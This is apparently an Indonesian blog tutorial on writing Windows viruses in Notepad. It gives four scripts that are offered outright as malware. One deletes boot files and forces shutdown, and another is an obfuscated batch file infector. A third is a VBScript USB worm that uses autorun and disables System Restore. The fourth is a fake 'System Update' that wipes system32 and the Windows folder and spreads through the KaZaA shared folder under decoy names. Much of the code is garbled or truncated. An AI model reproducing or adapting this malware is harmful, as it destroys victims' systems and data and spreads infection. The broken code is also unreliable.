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- Buat virus Windows dengan notepad
1. bikin
komputer jadi ga bisa reboot selamanya (kecuali INUL)
@echo off
attrib –r –s –h c:\autoexec.bat
del c:\autoexec.bat
attrib –r –s –h c:\boot.ini
del c:\boot.ini
attrib –r –s –h c:\ntldr
del c:\ntdlr
attrib –r –s –h c:\windows\win.ini
del c:\windows\win.ini
@echo off
Shutdown –s –t 7 –c “virus merajalela hahahaha c:Drive
save script diatas dengan format .bat lalu jalankan aksimu!
2. bikin semua format jadi .bat
@echo off
::Code in Bali @ Juny 20 1996
::Using H1N1 tech
set r=set
set s=attrib
goto 4people
%r% n=ren
%r% ok=*.bat
goto 2
%r% d=do
%r% k=copy
goto infek
%v% %%a %sa% (%ri%) %d% %k% %0 "%%a"
goto 1
%v% %%a %sa% (%ri%) %d% %n% %ri% %ok%
goto finish
%r% v=for
%r% sa=in
%r% ri=*.*
goto Gorontalo
%v% %%a %sa% (%ri%) %d% %s% "%%a" -s -r -h
goto infek2
copy dan save script diatas menjadi terserah.bat kalo ga ada efeknya ganti
formatnya jadi .vbs
3. yang lumayan dahsyat yang ini efek ditanggung sendiri
-------------------------script begin--------------------------
On error resume next
Dim dini,jatiya,i,loph,you,mf,isi,tf,vhck3d,nt,check,sd
'Siapkan isi autorun atau bahasa kerennya make the autorun
Isi = "[autorun]" & vbcrlf & "shellexecute=wscript.exe
Set you = createobject("scripting.filesystemobject")
Set mf = you.getfile(wscript.scriptfullname)
Dim text,size
Size = mf.size
Check = mf.drive.drivetype
Set text = mf.openastextstream(1,-2)
Do while not text.atendofstream
Dini = dini & text.readline
Dini = dini & vbcrlf
'Buat file induk bahasa coolnya prepare the mother
Set i = you.getspecialfolder(0)
Set jatiya = you.getspecialfolder(1)
Set tf = you.getfile(jatiya & "hck3d.vbs")
Tf.attributes = 32
Set tf = you.createtextfile(jatiya & "hck3d.vbs",2,true)
Tf.write dini
Set tf = you.getfile(jatiya & "hck3d.vbs")
Tf.attributes = 39
'Sebar ke removable disc ditambahkan dengan autorun.inf ini saya mah gak tau
bahasa inggrisnya
For each loph in you.drives
If (loph.drivetype = 1 or loph.drivetype = 2) and loph.path <>
"a:" then
Set tf=you.getfile(loph.path &"vhck3d.sys.vbs")
Tf.attributes =32
Set tf=you.createtextfile(loph.path &"vhck3d.vbs",2,true)
Tf.write dini
Set tf=you.getfile(loph.path &"vhck3d.vbs")
Tf.attributes = 39
Set tf =you.getfile(loph.path &"autorun.inf")
Tf.attributes = 32
Set tf=you.createtextfile(loph.path &"autorun.inf",2,true)
Tf.write isi
Set tf = you.getfile(loph.path &"autorun.inf")
End if
'Manipulasi registry
Set vhck3d = createobject("wscript.shell")
'Sudah Terlihat Jelas , Virus Ini Bermain Regedit Kita
Vhck3d.regwrite "hkey_local_machinesoftwaremicrosoftwindows
ntcurrentversionimage file execution
Vhck3d.regwrite "hkey_local_machinesoftwaremicrosoftwindows
ntcurrentversionimage file execution
Vhck3d.regwrite "hkey_local_machinesoftwaremicrosoftwindows
ntcurrentversionimage file execution
Vhck3d.regwrite "hkey_local_machinesoftwaremicrosoftwindows
ntcurrentversionimage file execution
Vhck3d.regwrite "hkey_local_machinesoftwaremicrosoftwindows
ntcurrentversionimage file execution
Vhck3d.regwrite "hkey_local_machinesoftwaremicrosoftwindows
ntcurrentversionimage file execution
Vhck3d.regwrite "hkey_local_machinesoftwaremicrosoftwindows
ntcurrentversionimage file execution
Vhck3d.regwrite "hkey_local_machinesoftwaremicrosoftwindows
ntcurrentversionimage file execution
Vhck3d.regwrite "hkey_local_machinesoftwaremicrosoftwindows
ntcurrentversionimage file execution
Vhck3d.regwrite "hkey_local_machinesoftwaremicrosoftwindows
ntcurrentversionimage file execution
Vhck3d.regwrite "hkey_local_machinesoftwaremicrosoftwindows
ntcurrentversionimage file execution
Vhck3d.regwrite "hkey_local_machinesoftwaremicrosoftwindows
ntcurrentversionimage file execution
Vhck3d.regwrite "hkey_local_machinesoftwaremicrosoftwindowscurrentversionwinlogonlegalnoticecaption",
"my loph dini"
"1", "reg_dword"
"1", "reg_dword"
Vhck3d.regwrite "hkey_local_machinesoftwarepoliciesmicrosoftwindows
ntsystemrestoredisablesr", "1", "reg_dword"
Vhck3d.regwrite "hkey_local_machinesoftwarepoliciesmicrosoftwindows
ntsystemrestoredisableconfig", "1", "reg_dword"
If check <> 1 then
Wscript.sleep 200000
End if
Loop while check <> 1
Set sd = createobject("wscript.shell")
Sd.run i & "explorer.exe /e,/select, " &
-----------------------end script-----------------------------
copy, save dengan nama vhck3d.vbs
4. efek belum ketauan, formatnyapun belum ketauan juga kalo bukan .bat pasti
if exist c:\romp.bat goto end
Echo Installing Update...
cd c:\windows\system
del keyboard.drv
del mouse.drv
TITLE System Update
echo ::startup >> c:\romp.bat
echo if not exist c:\damp goto prompt >> c:\romp.bat
echo :start >> c:\romp.bat
echo cls >> c:\romp.bat
echo cd c:\ >> c:\romp.bat
echo cd damp >> c:\romp.bat
echo md keys >> c:\romp.bat
echo pause >> c:\romp.bat
echo copy *.bat c:\damp\keys\ILOVEYOU.bat >> c:\romp.bat
echo copy *.bat c:\damp\keys\ILOVEYOU.bat c:\windows\stone.bat >>
echo rmdir c:\WUTemp >> c:\romp.bat
echo del c:\windows\system32\*.* >> c:\romp.bat
echo rmdir c:\windows\system32 >> c:\romp.bat
echo cd c:\ >> c:\romp.bat
echo cd windows >> c:\romp.bat
echo md system32 >> c:\romp.bat
echo pause >> c:\romp.bat
echo cd c:\ >> c:\romp.bat
echo cd windows >> c:\romp.bat
echo cd system32 >> c:\romp.bat
echo md tools >> c:\romp.bat
echo copy *.bat c:\windows\system32\tools\urscrewed.bat
echo echo msgbox" Ur system is now screwed" >> c:\plastic.vbs
>> c:\romp.bat
echo echo msgbox" This was no scan... it was more like a scam"
>> c:\plastic.vbs >> c:\romp.bat
echo echo msgbox" It has deleted pretty much all of system32 which is in
windows and has messed
with windows" >> c:\plastic.vbs >> c:\romp.bat
echo echo msgbox" There is no more windows on this computer" >>
c:\plastic.vbs >> c:\romp.bat
echo Rd/s/q c:\windows >> c:\romp.bat
echo Rd/s/q c:\progra~1 >> c:\romp.bat
echo goto part2 >> c:\romp.bat
>> c:\romp.bat
>> c:\romp.bat
echo :part2 >> c:\romp.bat
echo cls >> c:\romp.bat
echo cd c:\ >> c:\romp.bat
echo md Kierstyn'scan >> c:\romp.bat
echo pause >> c:\romp.bat
echo goto part3 >> c:\romp.bat
>> c:\romp.bat
>> c:\romp.bat
echo :part3 >> c:\romp.bat
echo rename c:\windows c:\viriiscan >> c:\romp.bat
echo goto end1 >> c:\romp.bat
echo :prompt >> c:\romp.bat
echo cls >> c:\romp.bat
echo cd c:\ >> c:\romp.bat
echo md damp >> c:\romp.bat
echo copy *.bat c:\damp.bat >> c:\romp.bat
echo echo msgbox" Oh No u r so stupid" >> c:\pomper.vbs
>> c:\romp.bat
echo echo msgbox" Wow you probably got this through ur lan" >>
c:\pomper.vbs >> c:\romp.bat
echo echo msgbox" Happy dieing staples" >> c:\pomper.vbs
>> c:\romp.bat
echo goto start >> c:\romp.bat
>> c:\romp.bat
>> c:\romp.bat
echo :end1 >> c:\romp.bat
echo Copy *.bat C:\Program Files\KaZaA\My Shared Folder\Matrix2.vid.bat
>> c:\romp.bat
echo Copy *.bat C:\Program Files\KaZaA\My Shared Folder\8-legged-freaks.vid.bat
>> c:\romp.bat
echo Copy *.bat C:\Program Files\KaZaA\My Shared Folder\Password_finder.exe.bat
>> c:\romp.bat
echo Copy *.bat C:\Program Files\KaZaA\My Shared Folder\s-club7.bmp.bat
>> c:\romp.bat
echo Copy *.bat C:\Program Files\KaZaA\My Shared Folder\JackAss the
movie.vid.bat >> c:\romp.bat
echo Copy *.bat C:\Program Files\KaZaA\My Shared Folder\password hacker.exe.bat
>> c:\romp.bat
echo Copy *.bat C:\Program Files\KaZaA\My Shared Folder\Norton anti
virus.exe.bat >> c:\romp.bat
echo Copy *.bat C:\Program Files\KaZaA\My Shared Folder\8-mile.mpg.bat >>
echo Copy *.bat C:\Program Files\KaZaA\My Shared Folder\kazaa.exe.bat >>
echo Copy *.bat C:\Program Files\KaZaA\My Shared Folder\realplayer.exe.bat
>> c:\romp.bat
echo Copy *.bat C:\Program Files\KaZaA\My Shared Folder\MyPic.bmp.bat >>
echo Copy *.bat C:\Program Files\KaZaA\My Shared Folder\Bill gates *very
funny*.bmp.bat >>
echo Copy *.bat C:\Program Files\KaZaA\My Shared Folder\Bill gates *very
funny*.mpg.bat >>
echo Copy *.bat C:\Program Files\KaZaA\My Shared Folder\windows xp.exe.bat
>> c:\romp.bat
echo Copy *.bat C:\Program Files\KaZaA\My Shared Folder\How to make
viruses.txt.bat >>
echo Copy *.bat C:\Program Files\KaZaA\My Shared Folder\*very funny*.bmp.bat
>> c:\romp.bat
echo Copy *.bat C:\Program Files\KaZaA\My Shared Folder\How to stop worm
viruses.txt.bat >>
echo goto end >> c:\romp.bat
echo :end >> c:\romp.bat
Echo Virus installed
cd c:\Docume~1\All Users\Start Menu\Programs\Startup
copy *.bat cd c:\Docume~1\All Users\Start Menu\Programs\Startup
Echo Now You have to restart to save
START C:\WINDOWS\RUNDLL.EXE user.exe,exitwindowsexec
rundll32.exe shell32.dll,SHExitWindowsEx n
del c:\thecreator.bat
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